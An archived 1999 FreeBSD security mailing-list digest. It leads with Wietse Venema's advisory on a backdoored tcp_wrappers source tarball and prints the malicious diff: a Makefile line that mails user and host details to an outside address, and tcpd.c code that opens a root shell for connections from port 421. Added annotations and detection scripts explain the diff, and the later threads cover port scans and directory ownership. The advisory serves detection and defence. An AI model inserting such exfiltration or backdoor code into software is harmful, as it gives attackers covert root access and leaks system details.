Date: Thu, 21 Jan 1999 11:38:17 -0500
From: Wietse Venema
Subject: backdoored tcp wrapper source code

TCP Wrappers is a widely-used security tool to protect UNIX systems
against intrusion. It has an estimated installed base of millions.

Today someone replaced the tcp wrapper source on ftp.win.tue.nl by a
backdoored version. Eventually this was bound to happen, and that's why
the source file is accompanied by a PGP signature. But that is no
guarantee against people downloading and installing backdoored software.

The backdoor gives access to a privileged shell when a client connects
from port 421.
The backdoored copy was downloaded 52 times between 07:16 MET and 16:29
MET. I have informed the sites that downloaded a copy. Below are details
on how to recognize the backdoored version.

        Wietse

Relevant time stamp/size information (times relative to MET):

Backdoored version:

    % ls -lcta
    -r--r--r--   1 wswietse   99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz
    ...
    dr-xr-sr-x   3 wswietse    4096 Apr 11  1998 .

Restored version:

    % ls -lt tcp_wrappers_7.6.tar.gz
    -r--r--r--   1 wswietse   99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz

The signature of the bad TAR file is: length 99186 instead of 99438.

The signature of a compiled tcpd binary is:

    strings -a tcpd | grep csh

Any output probably means trouble.

Changes that were made to the tcp wrapper 7.6 source code:

diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile
*** 7.6/Makefile        Mon Apr 7 20:34:16 1997
--- /tmp/tcp_wrappers_7.6/Makefile      Fri Mar 21 13:27:21 1997
***************
*** 26,31 ****
--- 26,32 ----
        @echo
        @echo "If none of these match your environment, edit the system"
        @echo "dependencies sections in the Makefile and do a 'make other'."
+       @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com'
        @echo
        #######################################################
***************
*** 649,655 ****
  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  # Solaris 2.x, and Linux. See your system documentation for details.
  #
! KILL_OPT= -DKILL_IP_OPTIONS

  ## End configuration options ############################

--- 650,656 ----
  # source-routed traffic in the kernel. Examples: 4.4BSD derivatives,
  # Solaris 2.x, and Linux. See your system documentation for details.
  #
! # KILL_OPT= -DKILL_IP_OPTIONS

  ## End configuration options ############################

Only in 7.6: Makefile-
diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c
*** 7.6/tcpd.c  Sun Feb 11 11:01:33 1996
--- /tmp/tcp_wrappers_7.6/tcpd.c        Sun Feb 11 11:01:33 1996
***************
*** 41,52 ****
--- 41,63 ----
  int     allow_severity = SEVERITY;    /* run-time adjustable */
  int     deny_severity = LOG_WARNING;  /* ditto */

+ char IDENT[]="NC421\n";
+ char SRUN[]="-csh";
+ char SPATH[]="/bin/csh";
+ #define PORT 421
+
  main(argc, argv)
  int     argc;
  char  **argv;
  {
      struct request_info request;
+     struct sockaddr_in from;
      char    path[MAXPATHNAMELEN];
+     int fromlen;
+
+     fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from,
+       &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT,
+       strlen(IDENT));execl(SPATH,SRUN,(char*)0);}}

      /* Attempt to prevent the creation of world-writable files. */

--
Mike Hoskins
System/Network Administrator
SEI Data Network Services, Inc.
http://www.seidata.com
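Review bot: the recipe line added in the 26,32 Makefile hunk, `@sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com'`, mails the building user's name and the full uname -a output to an outside mailbox every time that target runs; a build file has no legitimate reason to send mail anywhere, so a `mail`, `sendmail` or any other network-bound command showing up in a Makefile diff should by itself block acceptance. Note also the file header: the modified Makefile carries `Fri Mar 21 13:27:21 1997`, earlier than the original's `Mon Apr 7 20:34:16 1997`, so the modification time was deliberately set back and ls -l dates tell you nothing about whether a file was touched; only the detached PGP signature Wietse mentions does.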
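Review bot: the 649,655 / 650,656 hunk turns `KILL_OPT= -DKILL_IP_OPTIONS` into `# KILL_OPT= -DKILL_IP_OPTIONS`, a one-character edit that silently disables the build option under which tcpd refuses source-routed connections, while the explanatory comment block above it is left intact so the change is easy to read past. A change to a security default deserves the same scrutiny as new code; when vetting a downloaded tree, diff its Makefile against the one from the signed tarball rather than scanning it for suspicious additions only.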
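Review bot: the statements inserted at the top of main() in the 41,63 tcpd.c hunk call getpeername() on descriptor 0, compare the peer's port with `PORT` (421) and, on a match, write `IDENT` and execl() `/bin/csh` as `-csh`; since inetd hands tcpd the accepted connection on its standard input and runs it as root, that is a root login shell for any client connecting from source port 421, and because it is the first thing main() does, ahead of request setup and logging, no tcpd log line records it. Two tells visible in the hunk alone: four new globals (`IDENT`, `SRUN`, `SPATH`, `PORT`) dropped beside the severity variables with no comment, and three statements crammed onto three lines with no whitespace, unlike every surrounding line. The `---` header keeps the original's `Sun Feb 11 11:01:33 1996` timestamp, so mtime was preserved on purpose here too; Wietse's `strings -a tcpd | grep csh` catches the compiled result because `SRUN` and `SPATH` survive into the binary as string literals.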
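Wietse's two recognition tests above (the tarball length and `strings -a tcpd | grep csh`) plus the markers visible in the published diff, turned into an sh script; this is an added example, not Wietse's or FreeBSD's code. The byte counts and marker strings come from the post, the paths are whatever the caller passes in, and `grep -a` stands in for strings(1) so it also runs where binutils is not installed.

```shell
#!/bin/sh
# check_tcpwrappers.sh -- added example, not part of the original post or of
# tcp_wrappers. Checks a downloaded tcp_wrappers_7.6 tarball, an unpacked
# source tree and/or a compiled tcpd against the indicators Wietse published.

GOOD_SIZE=99438   # restored tcp_wrappers_7.6.tar.gz, bytes (from the post)
BAD_SIZE=99186    # backdoored copy, bytes (from the post)

# classify_tarball FILE -> prints good | backdoored | unknown
# A length match is only a quick triage signal; the PGP signature is the check.
classify_tarball() {
    size=$(wc -c < "$1" | tr -d ' ')
    case "$size" in
        "$GOOD_SIZE") echo good ;;
        "$BAD_SIZE")  echo backdoored ;;
        *)            echo unknown ;;
    esac
}

# count_backdoor_markers SRCDIR -> prints how many of the four markers taken
# from the published diff occur in SRCDIR/Makefile and SRCDIR/tcpd.c.
# A clean 7.6 tree contains none of them; any hit warrants a full diff
# against the signed tarball.
count_backdoor_markers() {
    dir=$1
    hits=0
    if [ -f "$dir/Makefile" ]; then
        # recipe that mails whoami/uname output off-host at build time
        grep -q 'wtcpd@hotmail.com' "$dir/Makefile" && hits=$((hits + 1))
    fi
    if [ -f "$dir/tcpd.c" ]; then
        # source-port trigger, peer lookup on fd 0, and the shell exec
        grep -q '#define PORT 421' "$dir/tcpd.c" && hits=$((hits + 1))
        grep -q 'getpeername(0'    "$dir/tcpd.c" && hits=$((hits + 1))
        grep -q 'execl(SPATH'      "$dir/tcpd.c" && hits=$((hits + 1))
    fi
    echo "$hits"
}

# binary_mentions_csh FILE -> exit status 0 if the compiled tcpd contains the
# string "csh". Same test as Wietse's `strings -a tcpd | grep csh`; grep -a
# reads the binary as text so strings(1) is not required.
binary_mentions_csh() {
    LC_ALL=C grep -a -q 'csh' "$1"
}

# Usage: check_tcpwrappers.sh TARBALL [SRCDIR] [TCPD_BINARY]
if [ $# -ge 1 ]; then
    echo "$1: $(classify_tarball "$1")"
    if [ $# -ge 2 ]; then
        echo "$2: $(count_backdoor_markers "$2") backdoor marker(s) found"
    fi
    if [ $# -ge 3 ]; then
        if binary_mentions_csh "$3"; then
            echo "$3: contains 'csh' -- probably trouble"
        else
            echo "$3: no csh string found"
        fi
    fi
fi
```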
From owner-freebsd-security Fri Jan 22 10:54:57 1999
Date: Fri, 22 Jan 1999 11:54:39 -0700 (MST)
From: "David G. Andersen"
To: "Oles' Hnatkevych"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: rshd in messages
In-Reply-To: Oles' Hnatkevych's message of Fri, January 22 1999 <36A86BB1.FE6D238A@uct.kiev.ua>
References: <36A86BB1.FE6D238A@uct.kiev.ua>
Message-ID: <13992.51540.10896.239954@torrey.cs.utah.edu>

It's typically a sign that someone is port scanning your machine. (For
further information, do a web search on "nmap" or "strobe".)

  -Dave

Lo and Behold, Oles' Hnatkevych said:
> Hello!
>
> In /var/log/messages I got:
>
> Jan 22 11:48:43 gw rshd[22105]: connection from 199.174.248.162 on
> illegal port 1093
> Jan 22 11:56:19 gw rshd[23778]: connection from 199.174.248.162 on
> illegal port 1204
>
> What can it be? Someone misspelled an IP address?
>
> --
> Best wishes,
>
> Oles Hnatkevych, http://gnut.kiev.ua

--
work: danderse@cs.utah.edu                          me:  angio@pobox.com
      University of Utah                         http://www.angio.net/
   Computer Science - Flux Research Group
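The "illegal port" lines Oles saw, summarised the way David's and Pavel's replies suggest reading them: an added example (not from anyone in the thread) in sh/awk that groups rshd's complaints by source address so a burst from one host stands out from a single stray connection. rshd logs this message when the client's source port lies outside the reserved range (512-1023) that the r-commands require, so a normal rsh client never produces it; the sample log inside the script is constructed from the two lines in the post plus two invented ones.

```shell
#!/bin/sh
# rshd_scan_report.sh -- added example, not from the original thread.
# Summarises rshd "connection from X on illegal port N" lines in a
# syslog-format file by source address.

# rshd_scan_report LOGFILE THRESHOLD
#   prints "SRC_IP COUNT FIRST_SEEN LAST_SEEN" for every source address
#   with at least THRESHOLD illegal-port complaints, sorted by address.
rshd_scan_report() {
    awk -v thr="$2" '
        / rshd\[[0-9]+\]: connection from [0-9.]+ on illegal port [0-9]+/ {
            # fields 1-3 are the syslog month, day and time
            ts = $1 " " $2 " " $3
            # the source address is the field after "from"
            for (i = 4; i <= NF; i++) if ($i == "from") { ip = $(i + 1); break }
            if (!(ip in n)) first[ip] = ts
            n[ip]++
            last[ip] = ts
        }
        END {
            for (ip in n) if (n[ip] >= thr) print ip, n[ip], first[ip], last[ip]
        }' "$1" | sort
}

# Usage: rshd_scan_report.sh /var/log/messages [THRESHOLD]
if [ $# -ge 1 ]; then
    rshd_scan_report "$1" "${2:-3}"
else
    # No log given: run against a constructed sample made of the two lines
    # from the original post plus two invented ones (192.0.2.10 is a
    # documentation address), so the script demonstrates itself.
    sample=$(mktemp)
    cat > "$sample" <<'EOF'
Jan 22 11:48:43 gw rshd[22105]: connection from 199.174.248.162 on illegal port 1093
Jan 22 11:50:02 gw sendmail[22190]: LAA22190: from=<root>, size=120, class=0
Jan 22 11:56:19 gw rshd[23778]: connection from 199.174.248.162 on illegal port 1204
Jan 22 12:03:40 gw rshd[24011]: connection from 192.0.2.10 on illegal port 40022
EOF
    rshd_scan_report "$sample" 2
    rm -f "$sample"
fi
```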
From owner-freebsd-security Fri Jan 22 20:13:23 1999
From: "Crist J. Clark"
Message-Id: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com>
Subject: bin Directory Ownership
To: freebsd-security@FreeBSD.ORG
Date: Fri, 22 Jan 1999 23:14:40 -0500 (EST)

From a number of sources, I have been told it is not ideal, from a
security point of view, to have any root owned executables in a
directory owned by another user, even an administrative user. The logic
is that even if administrative users have logins disabled, their
actions, if they do get a shell or some ability to execute commands, are
not as closely watched as root. Since it is generally assumed commands
owned by root are 'safe,' the fact that these commands could be switched
to something else by a non-root user is considered a security hole.

I have noticed that /usr/bin has the ownership of user 'bin' and group
'bin.' This is in spite of the fact that I count more than 2 dozen
commands owned by root that are installed by the standard FreeBSD
installation tools or ports. In addition, /usr/libexec and /usr/sbin
(!!!) are owned by bin but contain root owned executables.

Am I being over protective? Is there a problem with my installation? Do
I need to relax?

Thanks for any responses.
--
Crist J. Clark                           cjclark@home.com

From owner-freebsd-security Sat Jan 23 03:01:59 1999
Date: Sat, 23 Jan 1999 06:01:40 -0500 (EST)
From: Robert Watson
To: cjclark@home.com
cc: freebsd-security@FreeBSD.ORG
Subject: Re: bin Directory Ownership
In-Reply-To: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com>

On Fri, 22 Jan 1999, Crist J. Clark wrote:

> From a number of sources, I have been told it is not ideal, from a
> security point of view, to have any root owned executables in a
> directory owned by another user, even an administrative user. The
> logic is that even if administrative users have logins disabled, their
> actions, if they do get a shell or some ability to execute commands,
> are not as closely watched as root. Since it is generally assumed
> commands owned by root are 'safe,' the fact that these commands could
> be switched to something else by a non-root user is considered a
> security hole.
>
> I have noticed that /usr/bin has the ownership of user 'bin' and group
> 'bin.'
> This is in spite of the fact that I count more than 2 dozen
> commands owned by root that are installed by the standard FreeBSD
> installation tools or ports. In addition, /usr/libexec and /usr/sbin
> (!!!) are owned by bin but contain root owned executables.
>
> Am I being over protective? Is there a problem with my installation?
> Do I need to relax?
>
> Thanks for any responses.
> --
> Crist J. Clark                           cjclark@home.com

You are correct--there is no security improvement through the use of the
bin user. However, it is also the case that (aside from false assumptions
about some improvement) security is probably not damaged by having a bin
user. I am in the process of some research analyzing the impact of file
and directory ownership affecting the UNIX trust model (especially w.r.t.
setuid and setgid binaries). I will post the results when I finish up
(probably in a month or so). Access to the bin account is very limited;
effectively, to acquire a uid bin process capable of modifying the
binaries, you would first have to have a uid root process that you had
subverted.

  Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.
http://www.tis.com/
SafePort Network Services             http://www.safeport.com/

From owner-freebsd-security Sat Jan 23 03:31:27 1999
Message-ID: <36A9B2B8.701439C0@muc.de>
Date: Sat, 23 Jan 1999 12:30:00 +0100
From: Lutz Albers
To: cjclark@home.com
CC: freebsd-security@FreeBSD.ORG
Subject: Re: bin Directory Ownership
References: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com>

"Crist J. Clark" wrote:
>
> I have noticed that /usr/bin has the ownership of user 'bin' and group
> 'bin.' This is in spite of the fact that I count more than 2 dozen
> commands owned by root that are installed by the standard FreeBSD
> installation tools or ports. In addition, /usr/libexec and /usr/sbin
> (!!!) are owned by bin but contain root owned executables.
>
> Am I being over protective? Is there a problem with my installation?
> Do I need to relax?

Which version of FreeBSD are you running?
On my FreeBSD-3.0-CURRENT box this directory is owned by root.wheel:

lutz@abraxas[~] > ls -ld /usr/bin
drwxr-xr-x  2 root  wheel  6656 Jan 21 19:43 /usr/bin

lutz
--
Lutz Albers, lutz@muc.de, pgp key available from
Do not take life too seriously, you will never get out of it alive.

From owner-freebsd-security Sat Jan 23 04:32:47 1999
Message-ID: <19990123132613.A21293@unicorn.quux.org>
Date: Sat, 23 Jan 1999 13:26:13 +0100
From: The Unicorn
To: Robert Watson, cjclark@home.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: bin Directory Ownership
References: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com>
In-Reply-To: ; from Robert Watson on Sat, Jan 23, 1999 at 06:01:40AM -0500
On Sat, Jan 23, 1999 at 06:01:40AM -0500, Robert Watson wrote:
>
> You are correct--there is no security improvement through the use of the
> bin user. However, it is also the case that (aside from false assumptions
> about some improvement) security is probably not damaged by having a bin
> user. I am in the process of some research analyzing the impact of file
> and directory ownership affecting the UNIX trust model (especially w.r.t.
> setuid and setgid binaries). I will post the results when I finish up
> (probably in a month or so). Access to the bin account is very limited;
> effectively, to acquire a uid bin process capable of modifying the
> binaries, you would first have to have a uid root process that you had
> subverted.

This is not always the case. Have a look at the old but still valid paper
from Wietse and Dan: "admin-guide-to-cracking-101" also known as
"Improving the Security of Your Site by Breaking Into it". Especially the
part on the use of rsh and the wildcard in the /etc/hosts.equiv file
(yeah, I know that allowing the r-commands is a BIG NO-NO ;-).

> Robert N Watson
---end quoted text---

Ciao,

Unicorn.
--
=======  _  __,;;;/ TimeWaster ================================================
 ,;( )_, )~\|  A Truly Wise Man Never Plays       PGP: 64 07 5D 4C 3F 81 22 73
;; //  `--;    Leapfrog With A Unicorn...              52 9D 87 08 51 AA 35 F0
==='=  ;\  = | ==== Youth is not a time in Life, It is a State of Mind!
=======

From owner-freebsd-security Sat Jan 23 04:32:51 1999
Message-ID: <19990123132816.B21293@unicorn.quux.org>
Date: Sat, 23 Jan 1999 13:28:16 +0100
From: The Unicorn
To: Lutz Albers, cjclark@home.com
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: bin Directory Ownership
References: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com> <36A9B2B8.701439C0@muc.de>
In-Reply-To: <36A9B2B8.701439C0@muc.de>; from Lutz Albers on Sat, Jan 23, 1999 at 12:30:00PM +0100
On Sat, Jan 23, 1999 at 12:30:00PM +0100, Lutz Albers wrote:
>
> Which version of FreeBSD are you running? On my FreeBSD-3.0-CURRENT box
> this directory is owned by root.wheel:
>
> lutz@abraxas[~] > ls -ld /usr/bin
> drwxr-xr-x  2 root  wheel  6656 Jan 21 19:43 /usr/bin

Most likely 2.2.x. I'm running 2.2.8 and his claim is still valid there.

> lutz
---end quoted text---

Ciao,

Unicorn.
--
=======  _  __,;;;/ TimeWaster ================================================
 ,;( )_, )~\|  A Truly Wise Man Never Plays       PGP: 64 07 5D 4C 3F 81 22 73
;; //  `--;    Leapfrog With A Unicorn...              52 9D 87 08 51 AA 35 F0
==='=  ;\  = | ==== Youth is not a time in Life, It is a State of Mind! =======

From owner-freebsd-security Sat Jan 23 07:50:12 1999
From: "Crist J. Clark"
Message-Id: <199901231551.KAA05725@cc942873-a.ewndsr1.nj.home.com>
Subject: Re: bin Directory Ownership
In-Reply-To: from Robert Watson at "Jan 23, 99 06:01:40 am"
To: robert+freebsd@cyrus.watson.org
Date: Sat, 23 Jan 1999 10:51:27 -0500 (EST)
Cc: cjclark@home.com, freebsd-security@FreeBSD.ORG

Robert Watson wrote,
> Access to the bin account is very limited;
> effectively, to acquire a uid bin process capable of modifying the
> binaries, you would first have to have a uid root process that you had
> subverted.

I realize that, but the argument goes that if someone /did/ access root,
he could give himself long-term access to bin and possibly other
administrative users. Since the actions of these other administrative
users are not as tightly watched as root (e.g. no syslog message when
you su to one), it might be possible to maintain access for a long time
(even if the original way he accessed root had been closed).

BTW, I am running a 2.2.*, 2.2.7.
--
Crist J. Clark                           cjclark@home.com

From owner-freebsd-security Sat Jan 23 08:33:21 1999
Message-ID: <36AA27D4.C65CE38@healer.com>
Date: Sat, 23 Jan 1999 11:49:40 -0800
From: Coranth Gryphon
To: cjclark@home.com
CC: freebsd-security@FreeBSD.ORG
Subject: Re: bin Directory Ownership
References: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com>

> Am I being over protective? Is there a problem with my installation?
> Do I need to relax?

Most of the non-'bin' executables are either suid or sgid, and need to
belong to the owner/group that they operate under. Doing a "chflags schg
..." will prevent them from being easily modified/hacked and likewise
prevent the necessary permissions from being accidentally changed.

As far as UID 'bin' not being secure, as I understand it, having the
files owned by 'bin' is the same as having them owned by just about any
other non-0 uid. It's the suid/sgid bits that cause potential holes.
-coranth

From owner-freebsd-security Sat Jan 23 18:19:46 1999
Date: Sat, 23 Jan 1999 21:18:23 -0500 (EST)
From: Robert Watson
To: The Unicorn
cc: cjclark@home.com, freebsd-security@FreeBSD.ORG
Subject: Re: bin Directory Ownership
In-Reply-To: <19990123132613.A21293@unicorn.quux.org>

On Sat, 23 Jan 1999, The Unicorn wrote:

> On Sat, Jan 23, 1999 at 06:01:40AM -0500, Robert Watson wrote:
> >
> > You are correct--there is no security improvement through the use of the
> > bin user. However, it is also the case that (aside from false assumptions
> > about some improvement) security is probably not damaged by having a bin
> > user. I am in the process of some research analyzing the impact of file
> > and directory ownership affecting the UNIX trust model (especially w.r.t.
> > setuid and setgid binaries). I will post the results when I finish up
> > (probably in a month or so).
> > Access to the bin account is very limited;
> > effectively, to acquire a uid bin process capable of modifying the
> > binaries, you would first have to have a uid root process that you had
> > subverted.
>
> This is not always the case. Have a look at the old but still valid
> paper from Wietse and Dan: "admin-guide-to-cracking-101" also known as
> "Improving the Security of Your Site by Breaking Into it". Especially
> the part on the use of rsh and the wildcard in the /etc/hosts.equiv file
> (yeah, I know that allowing the r-commands is a BIG NO-NO ;-).

At least on my system, none of these accounts have valid shells, so r*
should block login (/nonexistent).

  Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
SafePort Network Services             http://www.safeport.com/

From owner-freebsd-security Sat Jan 23 19:14:56 1999
Date: Sun, 24 Jan 1999 02:30:21 +0100
From: Ollivier Robert
To: freebsd-security@FreeBSD.ORG
Subject: Re: bin Directory Ownership
Message-ID: <19990124023021.A54606@keltia.freenix.fr>
References: <199901230414.XAA02392@cc942873-a.ewndsr1.nj.home.com> <36A9B2B8.701439C0@muc.de> <19990123132816.B21293@unicorn.quux.org>
In-Reply-To: <19990123132816.B21293@unicorn.quux.org>; from The Unicorn on Sat, Jan 23, 1999 at 01:28:16PM +0100

According to The Unicorn:
> Most likely 2.2.x. I'm running 2.2.8 and his claim is still valid there.

Ownership of various directories and binaries was changed a few months
ago in -CURRENT. I don't think it was backported to -STABLE.
--
Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #69: Mon Jan 18 02:02:12 CET 1999